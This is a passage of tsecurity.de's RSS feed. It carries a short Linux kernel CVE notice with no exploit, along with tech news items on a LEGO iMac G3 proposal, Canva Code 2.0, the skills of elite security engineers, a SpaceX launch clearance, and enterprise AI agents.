<pubDate>Wed, 15 Jul 2026 21:24:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.1.129/6.6.79/6.12.16/6.13.4/6.14-rc3</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects the function <code>exit_fs</code> of the file <em>/sys/power/resume</em>. Such manipulation leads to null pointer dereference.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2025-21846">CVE-2025-21846</a>. The attack can only be initiated within the local network. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/f4f5bb15d46a-20260715]]></title>
<description><![CDATA[release tooling for v2026.7.2-beta.1 provenance resume]]></description>
<link>https://tsecurity.de/de/3671616/downloads/release-publishf4f5bb15d46a-20260715/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671616/downloads/release-publishf4f5bb15d46a-20260715/</guid>
<pubDate>Wed, 15 Jul 2026 20:31:34 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>release tooling for v2026.7.2-beta.1 provenance resume</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nostalgic Bondi Blue iMac G3 Could Become An Official LEGO Set]]></title>
<description><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under revi...]]></description>
<link>https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under review by the manufacturer.



If everything falls into place, you might soon be able to build a physical piece of computer history right on your desk.



The fan design features clear blue bricks and internal details



The proposed set comes from a creator named terauma on the official Ideas platform. This builder used exactly 700 pieces to recreate the famous desktop computer in stunning accuracy. The model perfectly captures the original retro aesthetic by using see through blue parts for the distinctive outer shell.



When you look closer, the attention to detail becomes even more obvious. The builder thoughtfully included small versions of the internal circuit boards and the heavy cathode ray tube monitor inside the casing. The whole package also features matching desktop accessories. Builders get to piece together the famous round hockey puck mouse and the classic keyboard with clear cables. It is a perfect tribute to the original Mac that helped reshape the personal computing market.



The final approval completely depends on passing strict licensing hurdles



The project recently reached a major milestone by gathering 10,000 votes from community supporters. This huge number means the toy company must formally review the idea for mass production. Currently, the set is sitting in a special parking lot status. This simply means the review board needs extra time to make a final decision, which is actually a very positive sign instead of an instant rejection.



The biggest challenge now is getting official permission from Apple to sell a branded product. The hardware maker is famously strict about its intellectual property and rarely approves third party merchandise. A previous fan project for a brick built retail store was quickly denied.



However, the extended review time suggests the two companies might be actively talking. If the tech brand decides to embrace its own history, this colorful kit could become a massive hit for vintage computer fans everywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA[Canva Code 2.0 Adds Visual Web Editing And Custom HTML Imports]]></title>
<description><![CDATA[Canva just released Canva Code 2.0, an updated platform that lets you build and edit websites, applications, and interactive experiences using simple prompts. The company is taking a big step into website creation by letting users type what they want and watch it appear on the screen. It builds o...]]></description>
<link>https://tsecurity.de/de/3670265/ios-mac-os/canva-code-20-adds-visual-web-editing-and-custom-html-imports/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670265/ios-mac-os/canva-code-20-adds-visual-web-editing-and-custom-html-imports/</guid>
<pubDate>Wed, 15 Jul 2026 12:09:58 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Canva just released Canva Code 2.0, an updated platform that lets you build and edit websites, applications, and interactive experiences using simple prompts. The company is taking a big step into website creation by letting users type what they want and watch it appear on the screen. It builds on previous updates to its generation tools and makes the whole process feel much closer to basic graphic design.



Users can build and edit interactive websites with basic prompts



You can start a new project by typing a description, or you can pick from more than 50 fresh templates. If you have already started building a page somewhere else, Canva allows you to import your HTML directly into its system. This makes it easy to move existing projects over to the new workspace and continue tweaking them.



The system places a heavy focus on teamwork and lets multiple people jump in and edit a project at the exact same time. It also ties directly into the main Canva editor, meaning you can pull up your saved brand colors and logos without opening another tab.



You can drag and drop images straight from its built-in library, change fonts, or click any text block to type something new. If you need a hand, you can select specific parts of the page and ask the artificial intelligence to change the layout or rewrite the words for you.



When a project is ready to go live, you have the option to link a custom domain or publish everything on a free Canva web address. The final websites are fully interactive and automatically resize to fit mobile screens.



This update marks a noticeable shift in how Canva operates, moving it from a standard image editor into a serious web publishing tool for small businesses and creators. As AI development pushes forward, visual website builders like this will likely become the standard way people create online spaces.]]></content:encoded>
</item>
<item>
<title><![CDATA[7 skills and traits of elite security engineers]]></title>
<description><![CDATA[Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.



Finding not just...]]></description>
<link>https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</guid>
<pubDate>Wed, 15 Jul 2026 09:08:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.</p>



<p class="wp-block-paragraph">Finding not just qualified security engineers, but the best and brightest available, needs to be a priority for CISOs and others overseeing security at their organizations. That’s especially true with the rapid rise of AI and the threats that brings to the enterprise.</p>



<p class="wp-block-paragraph">Here are some of the key skills and traits of elite security engineers to look for when hiring — or to acquire in order to uplevel your cybersecurity career.</p>



<h2 class="wp-block-heading">Acumen with AI-powered tools</h2>



<p class="wp-block-paragraph">These days, AI-related skills are in demand regardless of domain, and this certainly applies to security engineers. There’s a wealth of solutions leveraging AI in the market, tools that engineers can add to their defense arsenal.</p>



<p class="wp-block-paragraph">“AI is transforming security engineering from reactive alerting to predictive threat detection,” says Praveen Margabandhu, digital engineering anchor at financial services firm Navy Federal Credit Union. “AI-driven anomaly detection now identifies behavioral patterns that indicate fraud or compromise before traditional threshold-based systems would fire. This shifts the security engineer’s role from incident responder to threat model designer.”</p>



<p class="wp-block-paragraph">AI-powered tools have taken over a large portion of the detection and triage work that used to be the core of a security engineer’s day, says Maruf Ahmed, cofounder and CEO of global tech staffing firm Dexian. “Vulnerability scanning runs on its own now,” he says. “Threat flagging that used to require a team pulling through logs for hours happens in minutes.”</p>



<p class="wp-block-paragraph">This has freed up capacity on most security teams and changed what the day-to-day work looks like, Ahmed says. “With detection increasingly automated, the engineer’s value sits more in interpreting what gets flagged and deciding what to do about it,” he says.</p>



<h2 class="wp-block-heading">Keen understanding of emerging and established AI threats</h2>



<p class="wp-block-paragraph">Engineers must also have a thorough understanding of the risks AI presents, including <strong><a href="https://www.csoonline.com/article/4154222/6-ways-attackers-abuse-ai-services-to-hack-your-business.html">AI-enhanced cyberattacks</a> using</strong><strong> </strong>large language models (LLMs) to automate and scale <a href="https://www.csoonline.com/article/3819176/top-5-ways-attackers-use-generative-ai-to-exploit-your-systems.html">highly personalized social engineering attacks</a>, craft sophisticated malware, and generate deepfakes.</p>



<p class="wp-block-paragraph">Other <a href="https://www.csoonline.com/article/4110008/top-cyber-threats-to-your-ai-systems-and-infrastructure.html">AI threats they need to be aware of</a> include prompt injections, data and model poisoning, disclosure of sensitive information, model theft, supply chain compromises, and excessive agency.</p>



<p class="wp-block-paragraph">“The same generative tools that help security teams work faster are available to adversaries, and it shows,” Ahmed says. “Phishing campaigns read better and land more precisely than they did a year ago. Social engineering is harder to catch when the language is polished and tailored to the target, and security engineers are now defending against threats built with the same class of technology they use on the defensive side.”</p>



<p class="wp-block-paragraph">That has raised the bar for what reliable detection looks like, Ahmed says. “The objective shift I hear most from clients is about trust in their own systems,” he says. “Two years ago, the priority was visibility — making sure you could see across your environment. Most organizations have that now. The harder problem is knowing whether what those tools are telling you holds up under scrutiny and having people on the team who can stand behind those findings in front of a regulator or a board.”</p>



<h2 class="wp-block-heading">Appreciation of performance and business goals</h2>



<p class="wp-block-paragraph">The best security engineers understand how performance and security intersect, says Margabandhu, who leads performance engineering across Navy Federal Credit Union’s digital banking infrastructure, including real-time fraud detection, identity and access management, and cybersecurity infrastructure resilience.</p>



<p class="wp-block-paragraph">“A fraud detection system that is secure but too slow to catch transactions in real-time is not secure at all,” Margabandhu says. “Elite engineers optimize for both simultaneously.”</p>



<p class="wp-block-paragraph">Engineers must be able to put things in business context, Ahmed says. “An engineer who can work across domains, validate AI outputs, and learn new tools fast is valuable. But that value compounds when the person also understands what the organization is trying to protect and why,” he says.</p>



<p class="wp-block-paragraph">Security engineers who understand the business make better risk decisions, write more effective policies, and generate less friction with the teams around them, Ahmed says. “That is the profile employers are hiring toward right now, and it is where the talent shortage is most pronounced,” he says.</p>



<h2 class="wp-block-heading">Systems mindset</h2>



<p class="wp-block-paragraph">“One of the biggest misconceptions in cybersecurity hiring is that elite security engineers are defined purely by technical certifications or tool familiarity,” says Juan Mathews Rebello Santos, an independent cybersecurity researcher and ethical hacker.</p>



<p class="wp-block-paragraph">“Technical skill absolutely matters, but the strongest engineers I’ve worked with consistently share a combination of analytical thinking, operational adaptability, communication ability, and deep systems understanding,” Santos says.</p>



<p class="wp-block-paragraph">Elite security engineers understand how infrastructure, cloud services, identity systems, applications, APIs, networks, users, and business operations connect, Santos says.</p>



<p class="wp-block-paragraph">“Modern attacks rarely target a single isolated component anymore,” he says. “Threat actors chain together weaknesses across environments. Engineers who can understand those relationships holistically are significantly more effective at both prevention and incident response.”</p>



<h2 class="wp-block-heading">Cross-disciplinary fluency and broad stack know-how</h2>



<p class="wp-block-paragraph">Being an elite software engineer today means having a range of technology experience and knowledge. “Organizations want engineers who can work across more of the stack than they used to,” Ahmed says. “A role that might have asked for deep specialization in one area now expects someone who can move between cloud infrastructure, application security, and compliance without needing a handoff at every boundary.”</p>



<p class="wp-block-paragraph">The attack surface has continued to get wider, and the job descriptions for security engineers has followed suit. “That cross-domain fluency matters because security incidents rarely stay contained in one layer,” Ahmed says. “The engineer who can follow a problem from the network through the application to the data governance framework resolves it faster, with fewer people involved.”</p>



<p class="wp-block-paragraph">The strongest security engineers bridge infrastructure, application, and business domains, Margabandhu says. “They can speak to a CISO, a developer, and a cloud architect in the same conversation,” he says. “An engineer who can explain what an authentication problem means for fraud exposure moves faster in a room full of executives than one who can only describe it in infrastructure terms. I’ve watched technically brilliant people lose that race repeatedly.”<br><br></p>



<p class="wp-block-paragraph">Having the ability to communicate technical risk clearly to non-technical leadership can mean the difference between success and failure of attacks.</p>



<p class="wp-block-paragraph">“Many security failures today are not caused by lack of tooling, but by misalignment between technical teams and business decision-makers,” Santos says. “Elite engineers can explain operational risk, prioritization, and security tradeoffs in language executives understand.”</p>



<h2 class="wp-block-heading">Deep understanding of third-party risk and non-human threats</h2>



<p class="wp-block-paragraph">Threats can come from anywhere, including supply chains and non-human combatants. Third-party cybersecurity risks are on the rise. The 2026 Global CISO Leadership Report by executive search firm Hitch Partners, based on a survey of more than 625 information security executives across the US and Canada, says 43% put third-party risks as the No. 1 priority.</p>



<p class="wp-block-paragraph">“Most teams are still better at securing what they own than securing what they depend on,” Margabandhu says. “The mental shift from perimeter thinking to dependency thinking is real and not everyone has made it. The engineers who treat <a href="https://www.csoonline.com/article/4148315/apis-are-the-new-perimeter-heres-how-cisos-are-securing-them.html">every API call</a>, every credentialed vendor, every third-party model as part of their attack surface approach design differently.”</p>



<p class="wp-block-paragraph">Another growing source of potential threats are not human. <a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Machine identities</a> now outnumber human identities by ratios exceeding 100 to 1 in most enterprise environments, with some sectors closer to 500 to 1, according to the ManageEngine Identity Security Outlook 2026 report.</p>



<p class="wp-block-paragraph">This includes service accounts, API keys, automation tokens, and AI agents, any one of which can present data governance and security risks.</p>



<p class="wp-block-paragraph">Many organizations are still managing machine identities through manual processes that weren’t designed for scale, Margabandhu says. “Engineers who understand non-human identity governance are rare and increasingly important. This is not a future problem.”<br><br></p>



<h2 class="wp-block-heading">Willingness to keep learning</h2>



<p class="wp-block-paragraph">Security engineers need to have a desire to never stopped learning.</p>



<p class="wp-block-paragraph">“That sounds obvious until you work with people who’ve been doing this for 15 years and are still operating from the same threat models they built in 2012,” Margabandhu says. “Security changes fast enough that standing still is the same as going backwards.”</p>



<p class="wp-block-paragraph">The security engineers who keep up aren’t reading one report a year. “They’re genuinely curious about what attackers are doing right now, this month, and they adjust how they think accordingly,” Margabandhu says. “That quality is harder to hire for than most technical skills, because it’s not on a resume.”<br><br></p>



<p class="wp-block-paragraph">With AI presenting new and more sophisticated threats, keeping up with the latest developments is perhaps more important than ever. “Strong engineers are naturally investigative,” Santos says. “They actively study attack techniques, test assumptions, reverse engineer failures, and continuously adapt their understanding of risk.”</p>



<p class="wp-block-paragraph">The best security engineers are often the people who remain intellectually uncomfortable because they know the landscape is always evolving, Santos says.</p>



<p class="wp-block-paragraph">Employers have started paying closer attention to how fast someone can learn, Ahmed says. “The threat landscape and the defensive toolkit are both moving faster than any certification program can track, so hiring managers are probing for adaptability in interviews: how candidates have responded to recent shifts, whether they have picked up unfamiliar platforms on their own, how they work through problems they have not seen before,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX Starship Cleared for Next Launch After Two-Month Pause]]></title>
<description><![CDATA[The FAA has cleared SpaceX to resume Starship flights after a two-month pause, setting up a crucial test for the rocket and Starlink plans.
The post SpaceX Starship Cleared for Next Launch After Two-Month Pause appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3669043/it-nachrichten/spacex-starship-cleared-for-next-launch-after-two-month-pause/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669043/it-nachrichten/spacex-starship-cleared-for-next-launch-after-two-month-pause/</guid>
<pubDate>Tue, 14 Jul 2026 22:01:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FAA has cleared SpaceX to resume Starship flights after a two-month pause, setting up a crucial test for the rocket and Starlink plans.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-spacex-starship-faa-launch-clearance-2026/">SpaceX Starship Cleared for Next Launch After Two-Month Pause</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI agents are shaping the future of work]]></title>
<description><![CDATA[I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing function...]]></description>
<link>https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing functionality.  </p>



<p class="wp-block-paragraph">At the end of 2025, Anthropic and OpenAI launched new AI models and code-generating capabilities. More developers tried <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, and some platforms launched <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development capabilities</a>. By February 2026, even The New York Times reported that <a href="https://www.nytimes.com/2026/02/18/opinion/ai-software.html">the AI disruption had arrived</a>, noting that code generators were building “apps that may be flawed, but credible.”</p>



<p class="wp-block-paragraph">Wall Street investors took notice of the code-generation improvements and other disruptive factors, driving a selloff in SaaS stocks, now referred to as the “<a href="https://www.bloomberg.com/news/articles/2026-02-03/-get-me-out-traders-dump-software-stocks-as-ai-fears-take-hold">SaaSpocalypse</a>.” Part of their concern stemmed from the belief that CIOs would use AI to <a href="https://www.cio.com/article/4148303/cios-rethink-softwares-future-as-ai-agents-advance.html">write software that would replace SaaS solutions</a>.</p>



<h2 class="wp-block-heading">AI innovations from SaaS and solution providers</h2>



<p class="wp-block-paragraph">But I thought differently and wrote a response in my article asking whether <a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is the end of SaaS as we know it</a>. CIOs might use AI to accelerate application modernization, but I doubt they would replace their ERP, CRM, and even smaller SaaS point solutions by building them.</p>



<p class="wp-block-paragraph">Instead, I believed it would be SaaS companies that would take the most advantage of AI code-generation capabilities.</p>



<p class="wp-block-paragraph">This hypothesis drove me to attend nine conferences this spring to see how SaaS companies were launching AI agents and defining a new future of work. I wrote eight articles on <a href="https://drive.starcio.com/cios-need-to-know">what CIOs need to know</a> about data management, agile organizations, marketing, ERPs, critical process management, and other evolutions to plan for in the AI era.</p>



<p class="wp-block-paragraph">Now, looking across all nine conferences, I can draw some conclusions about how AI agents are shaping the future of work. Here are my learnings and what CIOs need to consider when evaluating and deploying AI agents in the workplace.</p>



<h2 class="wp-block-heading">Agentic, human-in-the-middle, or augmenting human?</h2>



<p class="wp-block-paragraph">SaaS companies have very distinct perspectives on the future of work, including the extent to which humans will play which roles and whether and how quickly we’ll see agentic, fully automated work.</p>



<p class="wp-block-paragraph">For example, Atlassian proclaimed, “<a href="https://www.atlassian.com/company/events">step into the future of human-AI collaboration</a>,” while SAP unveiled “<a href="https://news.sap.com/2026/05/sap-sapphire-sap-unveils-autonomous-enterprise/">the autonomous enterprise</a>.” Snowflake aimed to “<a href="https://www.snowflake.com/en/summit/">make AI real for business</a>,” while Appian targeted “<a href="https://www.appianworld.com/">serious AI built on process</a>.”</p>



<p class="wp-block-paragraph">These vendors’ marketers had to decide whether to lead with AI, people, or business in their messaging, but so must CIOs as they contemplate their AI strategies and how to get employees to fully adopt AI agents.</p>



<p class="wp-block-paragraph">Some CIOs see a fully automated agentic AI as the future, with human-in-the-middle as a transitional phase as departments build trust in AI agents’ decision-making and automation capabilities.</p>



<p class="wp-block-paragraph">Other CIOs see AI more as a tool that delivers productivity improvements by augmenting human decision-making capabilities. Many of these CIOs see human augmentation as essential to supporting critical thinking, innovation, and creativity.</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI Report</a>, published in January, provides a benchmark. It states that 36% of IT leaders expect at least 10% of their jobs to be fully automated in the next year, and 82% expect to reach that benchmark in three years.</p>



<p class="wp-block-paragraph">Many organizations will have a mix of AI agents, choosing automation where reliability at scale is possible, but opting for human augmentation in operationally critical or customer-facing domains. But how CIOs position AI agents is not only an operational strategy; it’s also a cultural statement that shapes employees’ embrace of AI and whether <a href="https://drive.starcio.com/2026/03/ai-leadership-job-at-risk-or-career-opportunity/">detractors vocalize job-loss fears</a>.</p>



<p class="wp-block-paragraph">In the short term, it will also weigh in on which AI agents to use from different partners and which areas to build in-house.</p>



<h2 class="wp-block-heading">Many options to test and deploy AI agents</h2>



<p class="wp-block-paragraph">Many solution providers are demonstrating significantly more AI agents this year. For example, SAP went from <a href="https://drive.starcio.com/2026/05/autonomous-enterprise-ai-cios/">40 Joule Agents in 2025 to over 200 in 2026.</a> Three technology capabilities are fueling this significant growth:</p>



<ul class="wp-block-list">
<li>Adobe, Appian, Boomi, Cisco, Domo, Salesforce, SAP, Snowflake, and others offer <a href="https://www.infoworld.com/article/3497094/does-your-organization-need-a-data-fabric.html">data fabrics</a> and <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data-pipeline</a> capabilities to connect data sources outside the primary workflows supported by their platforms. Appian, Pega, Quickbase, and SAP also centralize business process automation, an important starting point for developing AI agents.  </li>



<li><a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP servers</a> enable integration and communication between AI agents and are used to facilitate multistep agentic workflows. Virtually all the companies announcing major investments in AI agents are also announcing MCP integration capabilities and related partnerships.</li>



<li>Solution providers are not just using AI code-generating capabilities; many are launching their own AI agent development tools. The first beneficiaries of these development tools are the solution providers themselves and their integration partners, who use them to accelerate the development of AI agents and make them available to customers.</li>
</ul>



<p class="wp-block-paragraph">The result is that <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/">CIOs will have many options about which agents to test</a>, but will have to dedicate analysts to understand the capability, cost, and compliance trade-offs. Additionally, expect AI agent capabilities to evolve significantly over the next few years, so CIOs should continuously revisit their decisions regarding deployed AI agents, focusing on performance, benefits, and ROI.</p>



<p class="wp-block-paragraph">CIOs should also watch for signs of <a href="https://www.cio.com/article/1247890/7-steps-for-turning-shadow-it-into-a-competitive-edge.html">shadow AI</a> and employee confusion about which AI agents to experiment with on different platforms. The AI strategy should include a transparent, defined process for selecting, reviewing, evaluating, procuring, deploying, driving adoption, monitoring, and collecting end-user feedback around AI agents.</p>



<h2 class="wp-block-heading">AI development capabilities for engineers and citizen builders</h2>



<p class="wp-block-paragraph">The apparent ease-of-use of AI code generators may lead some engineering teams to <a href="https://www.cio.com/article/4097339/your-next-big-ai-decision-isnt-build-vs-buy-its-how-to-combine-the-two.html">build AI agents rather than buy them</a> from SaaS providers. But CIOs should quickly realize that coding is just one step in developing AI agents, and that aggressively pursuing a build strategy can lead to <a href="https://www.cio.com/article/4178324/7-sources-of-ai-debt-and-how-to-avoid-them.html">AI debt</a> and <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html">increased AI costs</a>.</p>



<p class="wp-block-paragraph">DevOps teams can code AI agents using tools such as Claude, Codex, Lovable, and Replit — a do-it-yourself approach. Some SaaS companies are providing an alternative, with AI agent development tools that leverage the data, infrastructure, and governance baked into their platforms. Many of these development tools offer flexibility, allowing developer teams to select AI models and development environments.</p>



<p class="wp-block-paragraph">Examples of new and enhanced AI development tools I saw at conferences this quarter include:</p>



<ul class="wp-block-list">
<li><a href="https://appian.com/blog/2025/appian-25-4-release-enterprise-ai-agents">Appian Composer and Agent Studio</a></li>



<li><a href="https://www.atlassian.com/software/rovo-dev">Atlassian Rovo Dev</a></li>



<li><a href="https://boomi.com/platform/companion/">Boomi Companion</a></li>



<li><a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/agentic-ops/cloud-control-studio/index.html">Cisco Cloud Control Studio</a></li>



<li><a href="https://www.domo.com/app-catalyst">Domo App Catalyst</a></li>



<li><a href="https://www.pega.com/about/news/press-releases/pega-harnesses-best-practices-and-ai-coding-agents-build-apps-mission">Pega Infinity Studio</a></li>



<li><a href="https://www.quickbase.com/pave">Quickbase Pave</a></li>



<li><a href="https://www.snowflake.com/en/product/snowflake-coco/">Snowflake CoCo</a></li>



<li><a href="https://www.sap.com/products/artificial-intelligence/joule-studio.html">SAP Joule Studio</a>.</li>
</ul>



<p class="wp-block-paragraph">I also reviewed <a href="https://www.nutanix.com/solutions/ai">Nutanix Agentic AI</a>, a platform-as-a-service for accelerating the deployment of agentic AI workloads, and <a href="https://www.adobe.com/products/firefly/features/ai-assistant.html">Adobe Firefly AI Assistant</a> for creatives.</p>



<p class="wp-block-paragraph">These development tools can target different audiences. Some look like low-code development tools targeted at software developers, whereas others are <a href="https://drive.starcio.com/2026/05/low-code-in-the-ai-era-cios-need-to-know/">no-code and enable citizen developers</a>, i.e., businesspeople, to <a href="https://www.cio.com/article/4176062/cios-are-enlisting-business-users-to-vibe-code-their-own-apps.html">develop applications and agents</a>. Additionally, some of these tools support spec-driven development and generate artifacts such as product requirement documents (PRDs), data models, and testing capabilities.</p>



<p class="wp-block-paragraph">Before commissioning AI development for apps and agents, CIOs should sponsor proofs of technical, data, modeling, security, and governance capabilities.</p>



<h2 class="wp-block-heading">The context layer powering AI agents</h2>



<p class="wp-block-paragraph">Between AI agents and the enterprise’s intelligence, including structured data sources, defined business processes, and agent interactions (both human-to-agent and agent-to-agent), lies an evolving “context layer.”</p>



<p class="wp-block-paragraph">This layer refers to the enterprise knowledge that AI agents draw on when evaluating signals and recommending or taking actions. Context may include a knowledge graph, a semantic layer, cleansed document repositories, and other knowledge bases.</p>



<p class="wp-block-paragraph">The context layer, skills, tools, out-of-the-box agents, and governance capabilities are some areas to review where solution providers differentiate. Some examples: </p>



<ul class="wp-block-list">
<li>Many support the <a href="https://open-semantic-interchange.org/">Open Semantic Interchange</a>, and some brand their context layers, such as the <a href="https://www.atlassian.com/platform/teamwork-graph">Atlassian Teamwork Graph</a>, <a href="https://boomi.com/knowledge-hub-early-access/">Boomi Knowledge Hub</a>, and the <a href="https://www.sap.com/products/artificial-intelligence/knowledge-graph.html">SAP Knowledge Graph</a>.</li>



<li>Some are branding their guardrails, such as <a href="https://business.adobe.com/products/brand-intelligence.html">Adobe’s AI Brand Intelligence</a>, <a href="https://appian.com/products/platform/artificial-intelligence">Appian’s Private AI</a>, and <a href="https://www.quickbase.com/intelligence-pack/ai-control-center">Quickbase AI Control Center</a>.</li>



<li>To manage AI agents at scale, some are extending the notion of data catalogs and other governance tools to the AI domain with products such as <a href="https://boomi.com/platform/connect/">Boomi Connect</a>, <a href="https://www.sap.com/products/artificial-intelligence/ai-agent-hub.html">SAP AI Agent Hub</a>, and <a href="https://www.snowflake.com/en/product/features/horizon/">Snowflake Horizon Catalog</a>.</li>
</ul>



<p class="wp-block-paragraph">CIOs should recognize that while solution providers will compete on capabilities, the real “secret sauce” of the context layer lies in the company’s trusted data, well-defined business processes, and employee adoption of AI agents.</p>



<h2 class="wp-block-heading">Conversational user experiences and coworkers</h2>



<p class="wp-block-paragraph">AI agents use the context layer, but also tap into skills, which encode the procedures they can follow, and tools, which prescribe the actions they can take. Before AI agents are ready to pilot, their governance, including permissions, approval gates, and other guardrails, must be defined. Other capabilities to look for when defining AI agents include orchestration, testing evals, and observability.</p>



<p class="wp-block-paragraph">In 2025, many solution providers bolted on AI agents to their existing user experiences. This year, many solution providers showcased new conversational user experiences that employees can use instead of traditional ones built with forms, flows, reports, and static dashboards. Conversational user experiences are where AI agents and people come together, whether it’s human-in-the-middle or human augmentation.</p>



<p class="wp-block-paragraph">Solution providers also grouped their AI agents into assistants or coworkers. For example, <a href="https://business.adobe.com/products/cx-enterprise-coworker.html">Adobe CX Coworker</a> illustrates human augmentation, helping marketers manage campaigns with prompts and monitor their performance. SAP launched <a href="https://www.sap.com/products/artificial-intelligence/ai-assistant.html">Joule Assistants</a> across several business functions, including finance, human capital, supply chain, and customer experience. Other assistants, such as <a href="https://docs.appian.com/suite/help/26.5/appian-ai-copilot.html">Appian AI Copilot</a>, <a href="https://www.atlassian.com/software/rovo">Atlassian Rovo</a>, <a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/ai-assistant/index.html">Cisco AI Assistant</a>, <a href="https://www.nutanix.com/blog/nutanix-intelligent-virtual-agent">Nutanix NIVA</a>, and <a href="https://www.snowflake.com/en/product/snowflake-cowork/">Snowflake CoWork</a>, offer AI-first user experiences to assist different end-user types.</p>



<p class="wp-block-paragraph">CIOs should demo these <a href="https://www.infoworld.com/article/4178415/what-will-ai-first-ux-look-like.html">AI-first user experiences</a> to glimpse the future of work.</p>



<p class="wp-block-paragraph">Developers are already getting used to these experiences through code generators and vibe coding tools. Now, similar capabilities are being tailored across all business functions. CIOs should ramp up their <a href="https://www.cio.com/article/4082282/preparing-your-workforce-for-ai-agents-a-change-management-guide.html">change management programs</a> to accelerate the adoption of these AI capabilities.</p>



<p class="wp-block-paragraph">Solution providers are showcasing AI capabilities that can help CIOs <a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/">reshape their businesses</a>. But in Q2, there were only a few examples of how AI can help CIOs drive growth, evolve business models, or embed AI into customer-facing products. I expect to see a wave of further AI innovations that will go beyond productivity improvements and efficiencies and help CIOs pursue <a href="https://drive.starcio.com/2025/02/cios-drive-genai-digital-transformation/">growth-driving digital transformation strategies</a>.  </p>



<p class="wp-block-paragraph"><em>Sacolick travelled to conferences mentioned in this article as a guest of Adobe, Appian, Atlassian, Domo, Nutanix, SAP, and Snowflake. In addition, he was hired by Quickbase to speak at its conference.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
